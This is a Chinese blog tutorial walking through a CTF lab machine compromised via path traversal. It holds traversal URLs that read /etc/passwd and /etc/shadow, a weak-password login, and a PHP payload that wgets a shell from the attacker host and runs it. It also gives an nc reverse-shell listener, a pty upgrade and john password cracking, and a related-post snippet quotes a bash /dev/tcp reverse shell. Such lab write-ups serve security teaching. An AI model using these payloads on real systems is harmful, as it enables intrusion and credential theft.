6-5CTF夺旗入门教程--路径遍历(www-data权限)

最新推荐文章于 2023-04-30 20:26:23 发布
最新推荐文章于 2023-04-30 20:26:23 发布
阅读量727 收藏 3
点赞数
分类专栏: CTF学习 文章标签: 数据库 linux 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105452915
版权
1.目录遍历漏洞介绍

路径遍历攻击(目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。

需要注意的事,系统操作访问控制(如在Windows操作系统上锁定或使用文件)限制了对文件的访问权限

这种攻击也称为“点-点斜线”、“目录遍历”、“目录爬升”和“回溯”

2.信息探测

#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.120
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.120
#探测敏感信息
nikto -host http://192.168.2.120
dirb http://192.168.2.120

3.深入挖掘

分析nmap、nikto扫描结果,分析挖掘可以利用的信息
查看http敏感页面
在这里插入图片描述

3.漏洞扫描

owasp-zap漏洞扫描器
在这里插入图片描述
在浏览器中访问owasp返回的Path-Traversal漏洞扫描结果

http://192.168.2.120/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

在这里插入图片描述

4.分析漏洞扫描结果

目录遍历漏洞
尝试其他文件,没有显示对应结果

http://192.168.2.120/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow

利用目录遍历漏洞获取shell思路:
上传webshell到服务器,之后通过对应的目录遍历路径访问并执行webshell,在kali中获取反弹shell

5.敏感页面上传shell

dbadmin敏感目录有敏感页面,浏览器访问,使用弱口令尝试登录(admin)
登录页面之后查找可利用的写webshell的点
使用/usr/share/webshells/php/下的webshell(php-reverse-shell.php)

新建数据库,数据表,字段

#写入
<?php system("cd /tmp;wget http://192.168.2.110/shell.php;chmod +x shell.php;php webshell");?>

在这里插入图片描述
在这里插入图片描述

5.监听反弹shell

创建服务器用于靶场机器下载对应shell

python -m "SimpleHTTPServer"

数据库字段值改为Web的端口
在这里插入图片描述
监听端口

nc -nlvp 4444

启动终端

python -c "import pty;pty.spawn('/bin/bash')"
6.总结

通过目录遍历漏洞配合文件上传webshell,反弹对应shell
目录遍历也可以用来获取敏感信息
例如 破解linux用户名和对应密码
/etc/passwd
/etc/shadow
unshadow passwd shadow > cracked
john cracked

The Riddler.
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NocoDB 文件读取(CVE-2023-35843)
失心少年
07-17 396
NocoDB版本小于0.106.1存在路径漏洞,未经身份验证的攻击者可通过操纵/download路由的路径参数来访问服务器上的任意文件。此漏洞允许攻击者访问服务器上的敏感文件和数据,包括配置文件、源代码和其他敏感信息
BitTraversal:Burpsuite 插件检测目录遍漏洞
05-29
BitTraversal-开发中 安装 要求 BurpSuite >= 1.7 JVM 运行时 >= 1.8 从 GitHub 安装 从 github 下载最新版本 使用 burpsuite 导航到Extender > Add 选择下载的.jar文件 核心理念 Mutator 将针对从 burpsuite 看到的每个请求运行,例如(代理、转发器、扫描仪)生成许多潜在的 url,每个都附加一个要传递给 Executor 和 Detector 类的有效负载,以检测其中一种检测技术是否成功 该插件使用两种主要技术来识别目录遍漏洞 检测方法 静电检测 动态检测 i) 使用在中指定的预定义有效,这些将在运行时从 GitHub 获取并与匹配 ii) 仍在开发中。 目的是检测与/static/css/main.css/和/static/../static/css/main.css相同的响应请求,
uWSGI PHP 目录遍漏洞(CVE-2018-7490)
H_123s的博客
08-09 340
1.漏洞详情 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI2.0.17之前的版本中存在路径漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有“…”序列的特殊url请求利用该漏洞查看系统上的任意文件。 2.漏洞编号 CVE-2018-7490 3.影响版本 Debian Debian_linux:8.0 Debian Debian_linux:9.0 4.启动环境 进入漏洞根目录下,编译并启动环境 docker-co.
linux系统提权——基于已经拿到www-data权限
热门推荐
m0re's blog
08-25 1万+
前言:上次学习利用目录遍漏洞获取了一个反弹的webshell,但是权限www-data,不是root权限,所以这次学习提权,拿到root权限。 本文目录提权介绍提权方式内核漏洞提权明文root密码提权计划任务总结: 提权介绍 往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 提权前提: 已经拿到低权shell 被入侵的机器上面有nc,python,perl等非常常见的工具 有权
DC靶机系列——DC3练习
shenpanzhimao的博客
03-01 1896
DC靶机系列——DC3 靶机地址: DC-3 1、Recon阶段 1.nmap扫描网段 得到目标 192.168.99.102 开启端口 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:1C:53:6A 显然是一个网页渗透 2.浏览器...
F5-steganography图片隐写工具,带使用方法,内含CTF群及所有工具包
11-29
F5-steganography图片隐写工具,带使用方法,内含CTF群及所有工具包
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
stripe-ctf-2.0:
05-19
压缩包文件"stripe-ctf-2.0-master"很可能包含了所有挑战的源代码和相关资源。通过分析这些代码,我们可以学习到如何设计安全挑战,了解攻击者可能会使用的技巧,同时也能提高自己的防御能力。例如,开发者可能会...
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
4. **pin-in-CTF-master文件夹结构**: 该项目的主分支可能包含以下内容: - `src`: 存放Pin工具的源代码和插件代码。 - `docs`: 文档和教程,帮助理解如何使用Pin工具解决CTF挑战。 - `examples`: 示例代码,...
php www-data,php-Www-data用户访问/ var / www /之外的文件/文件夹
weixin_32867357的博客
03-10 862
好的,PHP用户(www-data)是否可以访问服务器的其他部分,例如/ home / username / another_folder /?提前致谢.将编辑:我只是将www数据添加到另一个组吗?或类似的东西,或者还有另一种方法?解决方法:您可以创建另一个组,并将www-data(如果您的Web服务器在www-data用户下运行)添加到该组,然后将该组分配给所有您希望访问的文件.或者,如果您只需...
CTF-目录遍(拿到www-data用户权限)【简单易懂】
不知名白帽的博客
08-23 2342
CTF-目录遍(拿到www-data用户权限)【简单易懂】
ajax访问php出现跨域,Ajax访问PHP页面出现的跨域问题
weixin_39553904的博客
08-05 405
1.跨域问题:简单来说就是A域名下的程序想从B域名下的文件里面获取信息(这句话是我上网看到的)2.一般请求(本地测试):请求页响应页这样做是没问题的。但我如果将Ajax请求的url修改成http://127.0.0.1/TestJQ/Test1/ajax.php,就会出问题了控制台会报出XMLHttpRequest cannot load http://127.0.0.1/TestJQ/Test1...
php中ajax用法,详细为你解析AJAX的使用方法(代码贴上)
weixin_34005314的博客
03-11 454
下面是我给大家整理的AJAX的使用方法,有兴趣的同学可以去看看。HTTPS"/jsontest/randomdata/" // there was a missing trailing/// i.e.// was going to https://larsendt.com/jsontest/randomdata/?ymax=500&count=32&t=0.960417911050...
OSCP学习笔记总结(本资料禁止转载)
Shadow的博客
10-19 1万+
OSCP学习笔记 第零章实战学习 反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1 切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")' 查看系统型号:lab_release -a 查看系统版本:uname -a 查看目标主机网页内容:dirb http://192.168.1.1:80 查看网页漏洞:nikto -h 192.168.1.1 --useprox.
uWSGI PHP目录穿越漏洞(CVE-2018-7490)
EC_Carrot的博客
08-18 386
漏洞简介 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。 漏洞复现 访问http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件: ...
guppy 4.6.3远程文件共享
jahn的专栏
11-03 654
vuln.: GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion script info and download: http://www.freeguppy.org/ dork: "Site powered by GuppY" author: irk4z[at]yahoo.pl greets to: s
【墨者靶场】---2、uWSGI 漏洞复现(CVE-2018-7490)
qq_43168364的博客
08-21 502
背景介绍 uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 实训目标 1、学会根据漏洞编号查找漏洞详情; 2、了解uWSGI CVE-2018-7490漏洞形成原理; 3、掌握uWSGI CVE-2018-7490漏洞利用方法; 解题方向 利用
目录穿越/遍漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 4215
目录穿越(目录遍)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器根目录下的etc目录下的passwd文件的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值